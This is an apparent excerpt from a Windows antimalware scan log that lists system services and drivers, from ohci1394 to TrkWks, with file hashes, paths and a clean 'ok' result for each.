15:59:56.0365 0x42d8 [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394 C:\Windows\system32\drivers\ohci1394.sys
15:59:56.0381 0x42d8 ohci1394 - ok
15:59:56.0443 0x42d8 [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
15:59:56.0459 0x42d8 ose - ok
15:59:56.0662 0x42d8 [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
15:59:56.0818 0x42d8 osppsvc - ok
15:59:56.0849 0x42d8 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc C:\Windows\system32\pnrpsvc.dll
15:59:56.0865 0x42d8 p2pimsvc - ok
15:59:56.0880 0x42d8 [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc C:\Windows\system32\p2psvc.dll
15:59:56.0896 0x42d8 p2psvc - ok
15:59:56.0911 0x42d8 [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport C:\Windows\system32\drivers\parport.sys
15:59:56.0927 0x42d8 Parport - ok
15:59:57.0005 0x42d8 [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr C:\Windows\system32\drivers\partmgr.sys
15:59:57.0021 0x42d8 partmgr - ok
15:59:57.0067 0x42d8 [ 256390425414F90FCBC12F525A84EB11, A4992020BF6A239AD8A77125426E2C39980C9ABC971C4DBCB24B358F946AD7F9 ] PcaSvc C:\Windows\System32\pcasvc.dll
15:59:57.0083 0x42d8 PcaSvc - ok
15:59:57.0114 0x42d8 [ B9F2F6AACE16DC38EAA7AFD537854DF4, C1B8B495C16E28189BBE374B491417DC77502FE46286EA89F8C9D45B82F672A0 ] pci C:\Windows\system32\drivers\pci.sys
15:59:57.0130 0x42d8 pci - ok
15:59:57.0177 0x42d8 [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide C:\Windows\system32\drivers\pciide.sys
15:59:57.0192 0x42d8 pciide - ok
15:59:57.0208 0x42d8 [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
15:59:57.0223 0x42d8 pcmcia - ok
15:59:57.0239 0x42d8 [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw C:\Windows\system32\drivers\pcw.sys
15:59:57.0239 0x42d8 pcw - ok
15:59:57.0301 0x42d8 [ 946010CDFA91469351B22E2620CEBCD8, F099C92706D42ADC289B72724F7932E5D4F62A427AEC967DDB0A1D728AE59A63 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
15:59:57.0333 0x42d8 PEAUTH - ok
15:59:57.0348 0x42d8 [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost C:\Windows\SysWow64\perfhost.exe
15:59:57.0364 0x42d8 PerfHost - ok
15:59:57.0411 0x42d8 [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla C:\Windows\system32\pla.dll
15:59:57.0457 0x42d8 pla - ok
15:59:57.0520 0x42d8 [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay C:\Windows\system32\umpnpmgr.dll
15:59:57.0535 0x42d8 PlugPlay - ok
15:59:57.0551 0x42d8 [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg C:\Windows\system32\pnrpauto.dll
15:59:57.0551 0x42d8 PNRPAutoReg - ok
15:59:57.0582 0x42d8 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc C:\Windows\system32\pnrpsvc.dll
15:59:57.0598 0x42d8 PNRPsvc - ok
15:59:57.0645 0x42d8 [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
15:59:57.0676 0x42d8 PolicyAgent - ok
15:59:57.0691 0x42d8 [ A2CCA4FB273E6050F17A0A416CFF2FCD, C42BA18DF0C8E3F7358669A784E51E4DC7A4112096345EA699EDC95F561E0255 ] Power C:\Windows\system32\umpo.dll
15:59:57.0707 0x42d8 Power - ok
15:59:57.0738 0x42d8 [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
15:59:57.0769 0x42d8 PptpMiniport - ok
15:59:57.0785 0x42d8 [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor C:\Windows\system32\drivers\processr.sys
15:59:57.0785 0x42d8 Processor - ok
15:59:57.0832 0x42d8 [ 53E83F1F6CF9D62F32801CF66D8352A8, 1225FED810BE8E0729EEAE5B340035CCBB9BACD3EF247834400F9B72D05ACE48 ] ProfSvc C:\Windows\system32\profsvc.dll
15:59:57.0863 0x42d8 ProfSvc - ok
15:59:57.0879 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] ProtectedStorage C:\Windows\system32\lsass.exe
15:59:57.0879 0x42d8 ProtectedStorage - ok
15:59:57.0910 0x42d8 [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched C:\Windows\system32\DRIVERS\pacer.sys
15:59:57.0925 0x42d8 Psched - ok
15:59:57.0988 0x42d8 [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300 C:\Windows\system32\drivers\ql2300.sys
15:59:58.0019 0x42d8 ql2300 - ok
15:59:58.0050 0x42d8 [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
15:59:58.0066 0x42d8 ql40xx - ok
15:59:58.0097 0x42d8 [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE C:\Windows\system32\qwave.dll
15:59:58.0113 0x42d8 QWAVE - ok
15:59:58.0113 0x42d8 [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
15:59:58.0128 0x42d8 QWAVEdrv - ok
15:59:58.0144 0x42d8 [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
15:59:58.0159 0x42d8 RasAcd - ok
15:59:58.0206 0x42d8 [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn C:\Windows\system32\DRIVERS\AgileVpn.sys
15:59:58.0253 0x42d8 RasAgileVpn - ok
15:59:58.0269 0x42d8 [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto C:\Windows\System32\rasauto.dll
15:59:58.0300 0x42d8 RasAuto - ok
15:59:58.0315 0x42d8 [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
15:59:58.0331 0x42d8 Rasl2tp - ok
15:59:58.0347 0x42d8 [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan C:\Windows\System32\rasmans.dll
15:59:58.0378 0x42d8 RasMan - ok
15:59:58.0393 0x42d8 [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
15:59:58.0409 0x42d8 RasPppoe - ok
15:59:58.0425 0x42d8 [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
15:59:58.0440 0x42d8 RasSstp - ok
15:59:58.0471 0x42d8 [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
15:59:58.0487 0x42d8 rdbss - ok
15:59:58.0503 0x42d8 [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus C:\Windows\system32\drivers\rdpbus.sys
15:59:58.0518 0x42d8 rdpbus - ok
15:59:58.0549 0x42d8 [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
15:59:58.0581 0x42d8 RDPCDD - ok
15:59:58.0596 0x42d8 [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
15:59:58.0612 0x42d8 RDPENCDD - ok
15:59:58.0627 0x42d8 [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP C:\Windows\system32\drivers\rdprefmp.sys
15:59:58.0643 0x42d8 RDPREFMP - ok
15:59:58.0674 0x42d8 [ FE571E088C2D83619D2D48D4E961BF41, 88C5A2FCB1D0E528657842E39963471A6E42FCA3FCDF37955AEC8258AB4C48EA ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
15:59:58.0690 0x42d8 RDPWD - ok
15:59:58.0705 0x42d8 [ A115F49BEA840A5F049BC6310F35F776, 3A4D681959A493ECC24C4B0925F5F4FD336F93C317198C210907E466D3F704CA ] rdyboost C:\Windows\system32\drivers\rdyboost.sys
15:59:58.0721 0x42d8 rdyboost - ok
15:59:58.0737 0x42d8 [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess C:\Windows\System32\mprdim.dll
15:59:58.0783 0x42d8 RemoteAccess - ok
15:59:58.0799 0x42d8 [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry C:\Windows\system32\regsvc.dll
15:59:58.0830 0x42d8 RemoteRegistry - ok
15:59:58.0846 0x42d8 [ 3DD798846E2C28102B922C56E71B7932, 30B111615D74CB2213997A5C08DD9C8613ADE441D9423CC1C49A753D13CE524D ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
15:59:58.0861 0x42d8 RFCOMM - ok
15:59:58.0861 0x42d8 [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper C:\Windows\System32\RpcEpMap.dll
15:59:58.0877 0x42d8 RpcEptMapper - ok
15:59:58.0908 0x42d8 [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator C:\Windows\system32\locator.exe
15:59:58.0924 0x42d8 RpcLocator - ok
15:59:58.0955 0x42d8 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] RpcSs C:\Windows\system32\rpcss.dll
15:59:58.0971 0x42d8 RpcSs - ok
15:59:59.0017 0x42d8 [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
15:59:59.0033 0x42d8 rspndr - ok
15:59:59.0080 0x42d8 [ BB1C3DF1D6CC0972E9C7268A19E62D2E, C362BA0CB2B8CC0CBBD44A76DBC8FD2B44546B027CD794DC64E24D50BEA4FAC6 ] RSUSBSTOR C:\Windows\System32\Drivers\RtsUStor.sys
15:59:59.0095 0x42d8 RSUSBSTOR - ok
15:59:59.0142 0x42d8 [ 8181B5E7BFC040E0B26349C73E719335, EBB244A7E8E2CDC51041B2C2A78DCB77324F9E3746942C84902FCD928ADED897 ] RTL8167 C:\Windows\system32\DRIVERS\Rt64win7.sys
15:59:59.0158 0x42d8 RTL8167 - ok
15:59:59.0173 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] SamSs C:\Windows\system32\lsass.exe
15:59:59.0189 0x42d8 SamSs - ok
15:59:59.0220 0x42d8 [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
15:59:59.0236 0x42d8 sbp2port - ok
15:59:59.0267 0x42d8 [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr C:\Windows\System32\SCardSvr.dll
15:59:59.0298 0x42d8 SCardSvr - ok
15:59:59.0345 0x42d8 [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter C:\Windows\system32\DRIVERS\scfilter.sys
15:59:59.0361 0x42d8 scfilter - ok
15:59:59.0407 0x42d8 [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] Schedule C:\Windows\system32\schedsvc.dll
15:59:59.0454 0x42d8 Schedule - ok
15:59:59.0470 0x42d8 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc C:\Windows\System32\certprop.dll
15:59:59.0501 0x42d8 SCPolicySvc - ok
15:59:59.0517 0x42d8 [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC C:\Windows\System32\SDRSVC.dll
15:59:59.0532 0x42d8 SDRSVC - ok
15:59:59.0563 0x42d8 [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv C:\Windows\system32\drivers\secdrv.sys
15:59:59.0610 0x42d8 secdrv - ok
15:59:59.0626 0x42d8 [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] seclogon C:\Windows\system32\seclogon.dll
15:59:59.0641 0x42d8 seclogon - ok
15:59:59.0657 0x42d8 [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS C:\Windows\system32\sens.dll
15:59:59.0688 0x42d8 SENS - ok
15:59:59.0704 0x42d8 [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc C:\Windows\system32\sensrsvc.dll
15:59:59.0704 0x42d8 SensrSvc - ok
15:59:59.0735 0x42d8 [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum C:\Windows\system32\drivers\serenum.sys
15:59:59.0735 0x42d8 Serenum - ok
15:59:59.0751 0x42d8 [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial C:\Windows\system32\drivers\serial.sys
15:59:59.0766 0x42d8 Serial - ok
15:59:59.0797 0x42d8 [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse C:\Windows\system32\drivers\sermouse.sys
15:59:59.0797 0x42d8 sermouse - ok
15:59:59.0829 0x42d8 [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv C:\Windows\system32\sessenv.dll
15:59:59.0891 0x42d8 SessionEnv - ok
15:59:59.0907 0x42d8 [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
15:59:59.0922 0x42d8 sffdisk - ok
15:59:59.0938 0x42d8 [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
15:59:59.0953 0x42d8 sffp_mmc - ok
15:59:59.0969 0x42d8 [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
15:59:59.0969 0x42d8 sffp_sd - ok
15:59:59.0985 0x42d8 [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
15:59:59.0985 0x42d8 sfloppy - ok
16:00:00.0031 0x42d8 [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess C:\Windows\System32\ipnathlp.dll
16:00:00.0063 0x42d8 SharedAccess - ok
16:00:00.0078 0x42d8 [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
16:00:00.0109 0x42d8 ShellHWDetection - ok
16:00:00.0125 0x42d8 [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2 C:\Windows\system32\drivers\SiSRaid2.sys
16:00:00.0141 0x42d8 SiSRaid2 - ok
16:00:00.0156 0x42d8 [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
16:00:00.0156 0x42d8 SiSRaid4 - ok
16:00:00.0187 0x42d8 [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb C:\Windows\system32\DRIVERS\smb.sys
16:00:00.0219 0x42d8 Smb - ok
16:00:00.0250 0x42d8 [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
16:00:00.0250 0x42d8 SNMPTRAP - ok
16:00:00.0265 0x42d8 [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr C:\Windows\system32\drivers\spldr.sys
16:00:00.0281 0x42d8 spldr - ok
16:00:00.0312 0x42d8 [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] Spooler C:\Windows\System32\spoolsv.exe
16:00:00.0328 0x42d8 Spooler - ok
16:00:00.0406 0x42d8 [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc C:\Windows\system32\sppsvc.exe
16:00:00.0499 0x42d8 sppsvc - ok
16:00:00.0531 0x42d8 [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify C:\Windows\system32\sppuinotify.dll
16:00:00.0562 0x42d8 sppuinotify - ok
16:00:00.0577 0x42d8 [ 441FBA48BFF01FDB9D5969EBC1838F0B, 306128F1AD489F87161A089D1BDC1542A4CB742D91A0C12A7CD1863FDB8932C0 ] srv C:\Windows\system32\DRIVERS\srv.sys
16:00:00.0593 0x42d8 srv - ok
16:00:00.0624 0x42d8 [ B4ADEBBF5E3677CCE9651E0F01F7CC28, 726DB2283113AB2A9681E8E9F61132303D6D86E9CD034C40EE4A8C9DB29E87F7 ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
16:00:00.0640 0x42d8 srv2 - ok
16:00:00.0655 0x42d8 [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
16:00:00.0671 0x42d8 srvnet - ok
16:00:00.0687 0x42d8 [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
16:00:00.0733 0x42d8 SSDPSRV - ok
16:00:00.0765 0x42d8 [ 0211AB46B73A2623B86C1CFCB30579AB, 7CC9BA2DF7B9EA6BB17EE342898EDD7F54703B93B6DED6A819E83A7EE9F938B4 ] SSPORT C:\Windows\system32\Drivers\SSPORT.sys
16:00:00.0765 0x42d8 SSPORT - ok
16:00:00.0765 0x42d8 [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc C:\Windows\system32\sstpsvc.dll
16:00:00.0796 0x42d8 SstpSvc - ok
16:00:00.0811 0x42d8 [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor C:\Windows\system32\drivers\stexstor.sys
16:00:00.0811 0x42d8 stexstor - ok
16:00:00.0843 0x42d8 [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc C:\Windows\System32\wiaservc.dll
16:00:00.0874 0x42d8 stisvc - ok
16:00:00.0905 0x42d8 [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum C:\Windows\system32\drivers\swenum.sys
16:00:00.0905 0x42d8 swenum - ok
16:00:00.0967 0x42d8 [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv C:\Windows\System32\swprv.dll
16:00:00.0999 0x42d8 swprv - ok
16:00:01.0077 0x42d8 [ 7BE4CDEA6BC7832BFE3112A350D8B9EA, B51BD5A02D20C1CD8F7B4326114C2FA57ABD8D75133D6CE906CB65E97AAB7F70 ] SysMain C:\Windows\system32\sysmain.dll
16:00:01.0123 0x42d8 SysMain - ok
16:00:01.0139 0x42d8 [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
16:00:01.0155 0x42d8 TabletInputService - ok
16:00:01.0170 0x42d8 [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv C:\Windows\System32\tapisrv.dll
16:00:01.0201 0x42d8 TapiSrv - ok
16:00:01.0217 0x42d8 [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS C:\Windows\System32\tbssvc.dll
16:00:01.0233 0x42d8 TBS - ok
16:00:01.0311 0x42d8 [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
16:00:01.0357 0x42d8 Tcpip - ok
16:00:01.0404 0x42d8 [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] TCPIP6 C:\Windows\system32\DRIVERS\tcpip.sys
16:00:01.0435 0x42d8 TCPIP6 - ok
16:00:01.0467 0x42d8 [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
16:00:01.0482 0x42d8 tcpipreg - ok
16:00:01.0498 0x42d8 [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
16:00:01.0513 0x42d8 TDPIPE - ok
16:00:01.0529 0x42d8 [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
16:00:01.0529 0x42d8 TDTCP - ok
16:00:01.0545 0x42d8 [ DDAD5A7AB24D8B65F8D724F5C20FD806, B71F2967A4EE7395E4416C1526CB85368AEA988BDD1F2C9719C48B08FAFA9661 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
16:00:01.0576 0x42d8 tdx - ok
16:00:01.0591 0x42d8 [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD C:\Windows\system32\drivers\termdd.sys
16:00:01.0607 0x42d8 TermDD - ok
16:00:01.0638 0x42d8 [ 4FC4C50985E5B840F4D72E57286887B8, 0BCBB4A938803AE3A3532B6D8FFC85594AA9AEF5D8F9792684841BEA8780AE9E ] TermService C:\Windows\System32\termsrv.dll
16:00:01.0669 0x42d8 TermService - ok
16:00:01.0685 0x42d8 [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes C:\Windows\system32\themeservice.dll
16:00:01.0701 0x42d8 Themes - ok
16:00:01.0716 0x42d8 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER C:\Windows\system32\mmcss.dll
16:00:01.0732 0x42d8 THREADORDER - ok
16:00:01.0747 0x42d8 [ DBCC20C02E8A3E43B03C304A4E40A84F, BF5F3ACCB0342304A6870E94D2576644B08DBF307C853C7DBA4B82B0C7309DA4 ] TPM C:\Windows\system32\drivers\tpm.sys
16:00:01.0763 0x42d8 TPM - ok
16:00:01.0763 0x42d8 [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks C:\Windows\System32\trkwks.dll
16:00:01.0794 0x42d8 TrkWks - ok
